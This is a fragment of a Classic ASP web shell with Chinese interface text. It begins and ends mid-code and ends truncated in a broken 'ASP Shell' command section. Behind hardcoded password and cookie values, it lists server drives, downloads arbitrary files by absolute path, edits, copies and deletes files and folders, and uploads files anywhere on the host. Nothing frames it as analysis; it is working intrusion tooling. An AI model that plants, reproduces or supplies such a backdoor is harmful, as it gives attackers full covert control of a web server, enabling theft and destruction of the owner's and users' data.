| |
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.ASP"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case "list.asp"%>
<%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href=" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"><font color=#FF8000>■</font>↑<font color=ff2222>回上级目录</font></a><br><script language=VBScript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script><%
end if
End Sub
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border=0 width=100% cellpadding=0><script language=vbscript>"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">
<!--
table{ font-family: 宋体; font-size: 9pt }
a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }
a:visited{ color: rgb(128,0,0) }
td { font-size: 9pt}
a { color: #000000; text-decoration: none}
a:hover { text-decoration: underline}
.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}
.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}
.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}
-->
</style>
</head>
<script language="JavaScript">
function crfile(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = #FFCC00"" onMouseOut=""this.style.backgroundColor = #FFefdf""><td width=50%><font color=#FF8000><font face=Wingdings>+</font></font><a href="& urlpath & lpath & xName &" target=_blank><strong>" & showstring & "</strong></a></td><td width=20% align=right>" & size & "字节</td><td width=30%><a href=# title=类型:" & type1 & chr(10) & "属性:" & Attributes & chr(10) & "时间:" & DateLastModified &">属性</a> <a href=<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &" target=_blank ><font color=#FF8000 ></font>编辑</a> <a href="&chr(34)&"Javascript: rmdir1("& lpath & xName &")"&chr(34)&"><font color=#FF8000 ></font>删除</a> <a href=# onclick=copyfile(" & lpath & Name & ")><font color=#FF8000 ></font>复制</a> <a href=<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &" target=_blank ><font color=#FF8000 ></font>下载</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
document.write "<a href=<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &">└<font color=#FF8000><font face=Wingdings>1</font></font> " & xName &"</a> <a href="&chr(34)&"javascript: rmdir("& lpath & xName &")"&chr(34)&"><font color=#FF8000 ></font>删除</a><br>"
end sub
sub rmdir1(ls)
if confirm("你真的要删除这个文件吗!"&Chr(13)&Chr(10)&"文件为:"&ls) then
window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub rmdir(ls)
if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为:"&ls) then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub copyfile(sfile)
dfile=InputBox("※文件复制※"&Chr(13)&Chr(10)&"源文件:"& sfile&Chr(13)&Chr(10)&"输入目标文件的文件名:"&Chr(13)&Chr(10) &"[允许带路径,要根据你的当前路径模式]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "对不起,你在相对路径模式下不能使用绝对路径"&Chr(13)&Chr(10)&"错误路径:["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您没有输入文件名!"
end If
end sub
</script>
<body>
<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"
bordercolordark="#FFFFFF" cellspacing="0">
<tr>
<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"
color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※换盘:<span
style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%
For Each thing in oFileSys.Drives
Response.write "<font face=Wingdings>:</font><a href=" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true>"&thing.DriveLetter&":</a>"
NEXT
%> </span> 地址:
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※<%
if Request("attrib")="true" then
response.write "<a href=" & rseb & "?q=list.asp>切到相对路径</a>"
else
response.write "<a href=" & rseb & "?attrib=true&q=list.asp>切到绝对路径</a>"
end if
%> ※绝对:<span
style="background-color: rgb(255,255,255)"><%=cpath%></span></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※当前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>
</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">
编辑|
<input class="tx1" type="text" name="filename" size="20">
<input class="tx1" type="button" value="建文" onclick="crfile(form1.filename.value)">
<input class="tx1" type="button" value="建目" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="tx1" style="width:100" value="">
<input type="text" name="filepath" class="tx1" style="width:100" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="tx" value="1">
<input class="tx1" type="submit" value="上传">
<input class="tx1" type="button" onclick="window.open(<%=rseb%>?q=cmd.asp,_blank)" value="命令">
<input class="tx1" type="button" onclick="window.open(<%=rseb%>?q=test.asp,_blank)" value="配置">
<input class="tx1" type="button" onclick="window.open(<%=rseb%>?q=p.asp,_blank)" value="nfso">
</td>
</td>
</tr></form>
<tr>
<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>
</td>
<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>
</td>
</tr>
</table>
<%else
response.write "Password Error!"
response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>"
end if
%>
</body>
</html>
<%case "edit.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>编辑源代码</title>
<style>
<!--
table{ font-family: 宋体; font-size: 12pt }
a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }
a:visited{ color: rgb(128,0,0) }
-->
</style>
</head>
<body>
<% 读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write "<script>alert(删除成功!要刷新才能看到效果);window.close();</script>"
else
if request("op")="copy" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.copy dsfile
%>
<script language=vbscript>
msgbox "源文件:<%=whichfile%>" & vbcrlf & "目的文件:<%=dsfile%>" & vbcrlf & "复制成功!要刷新才能看到效果!"
window.close()
</script>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<form method="POST" action="<%=rseb%>?q=edit.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"
width="700" cellpadding="0">
<tr>
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45"
value="<%=Request("path")%> ">直接更改文件名,相当于“另存为”</td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"
value="提交" name="B1"><input type="reset" value="复原" name="B2"></td>
</tr>
</table>
</form>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write "<script>alert(修改成功!要刷新才能看到效果);window.close();</script>"
end if
end if
end if
else
response.write "Password Error!"
response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>"
end if
%>
</body>
</html>
<%case "edir.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>目录操作</title>
<style>
<!--
table{ font-family: 宋体; font-size: 12pt }
a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }
a:visited{ color: rgb(128,0,0) }
-->
</style>
</head>
<body>
<% 读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write "<script>alert(删除的目录为:" & whichdir & "删除成功!要刷新才能看到效果);window.close();</script>"
else
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write "<script>alert(建立的目录为:" & whichdir & "建立成功!要刷新才能看到效果);window.close();</script>"
end if
end if
else
response.write "Password Error!"
response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>"
end if
%>
</body>
</html>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize>0 then
file.SaveAs formPath & file.FileName
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>"
iCount=iCount+1
end if
set file=nothing
next
set upload=nothing
Htmend iCount&" 个文件上传结束!"
sub HtmEnd(Msg)
set upload=nothing
Response.write "上传完毕!要刷新才能看到效果!<P><input value=关闭 type=button onclick=window.close();>"
response.end
end sub
else
response.write "Password Error!"
response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>"
end if
case "cmd.asp"
if Request.Cookies("password")<>"7758521" then
response.write "Password Error!"
response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>"
else%>
<title>ASP Shell</title>
<object runat=server id=oScript scope=page class)
end function
%>
|